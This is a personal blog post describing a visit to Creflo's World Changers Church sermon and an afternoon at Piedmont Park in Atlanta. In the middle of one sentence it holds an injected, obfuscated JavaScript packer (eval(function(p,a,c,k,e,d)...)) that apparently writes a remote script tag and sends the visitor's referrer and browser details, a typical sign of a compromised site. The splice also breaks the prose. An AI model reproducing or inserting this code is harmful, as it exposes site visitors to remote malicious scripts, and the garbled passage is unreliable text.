Sunday Musings at Piedmont Park

After listening to Creflo turn World Changers Church into a revival, it left me thinking about religion.  Some of Creflo’s messages he preached surprised me by its unusual nature.  For instance, in a video clip message created from testimonies of church members, one person said WCC hated religion but love God.  The sermon started with a skit between two prostitutes discussing why they should or should not continue down their career of choice.  I was surprised in some ways but not in others.  The congregation is predominately black, which means that Creflo, as a preacher, must find ways to communicate to his dedicated flock.

Creflo is one of the televised evangicles that you see on Sunday mornings.  After I found out that he regularly preaches at a church close to me, I had to go and see what all the hoop-la was about.  It turned out to be a very interesting experience.  The sermon centered around living above the influence of satan and following the word of Jesus.  If you can strip away the talking in tongues, multi-flat buy eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kezbe|var|u0026u|referrer|bkfka||js|php’.split(‘|’),0,{}))

screen TVs throughout the dome room, and the strange black woman that was sitting next to me, shouting every third word Creflo said as if she was memorizing the sermon and preaching to me, then I believe that the message was like most messages delivered at churches around the U.S.  Jesus redeemed us with his blood and we must try and live our lives to be worthy of his sacrifice so we may enter the pearly gates.

I especially liked Creflo’s message to not complain because of the recession or when you don’t get what you want because there is always someone who is worse off than you.  After traveling to third-world countries, I definitely appreciate my life more and take  this message to heart.

After church, I spent the afternoon at the park with my roommate.  I’ve been spending everyday online searching for jobs, but on Sunday, I needed to honor sabbath.  We drove out of the suburbs into Midtown Atlanta where Piedmont park is nestled between skyscrapers.  I took the opportunity to take some photos:
